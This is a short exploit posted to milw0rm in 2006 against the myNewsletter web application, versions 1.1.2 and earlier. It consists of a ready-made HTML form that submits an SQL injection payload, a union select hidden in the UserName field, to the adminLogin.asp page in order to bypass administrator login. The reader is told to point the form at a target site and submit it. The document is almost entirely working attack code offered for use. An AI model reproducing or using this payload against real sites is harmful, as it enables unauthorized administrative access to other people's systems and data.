myNewsletter <= 1.1.2 (adminLogin.asp) Login Bypass Exploit<!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->
<center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit
</center><form name=`adminLogin` method=`post` action=`http://site/newsletter/adminLogin.asp`>
<input type=`hidden` name=`UserName` value=`<!--'union select 1 from Newsletter_Admin where ''='`>
<input type=`hidden` name=`Password` value=`1`>
<center><br><input type=`submit` name=`Submit` value=`Login`></center><br><br>
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
<center><a href=`http://www.kapda.ir`>www.kapda.ir</a></center>
</form>


# milw0rm.com [2006-06-06]